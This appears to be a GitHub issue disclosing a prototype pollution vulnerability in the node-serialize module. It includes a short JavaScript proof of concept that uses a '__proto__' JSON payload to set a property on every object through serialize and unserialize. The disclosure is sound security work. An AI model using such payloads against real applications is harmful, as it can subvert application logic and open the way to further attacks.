Open po6ix opened 4 years ago
This module has prototype pollution vulnerablity and it can make logic vulnerability in application using
const serialize = require('node-serialize'); var obj = JSON.parse(`{"__proto__": {"polluted": true}}`); let serialized = serialize.serialize(obj); serialize.unserialize(serialized); console.log(polluted); // true
This module has prototype pollution vulnerablity and it can make logic vulnerability in application using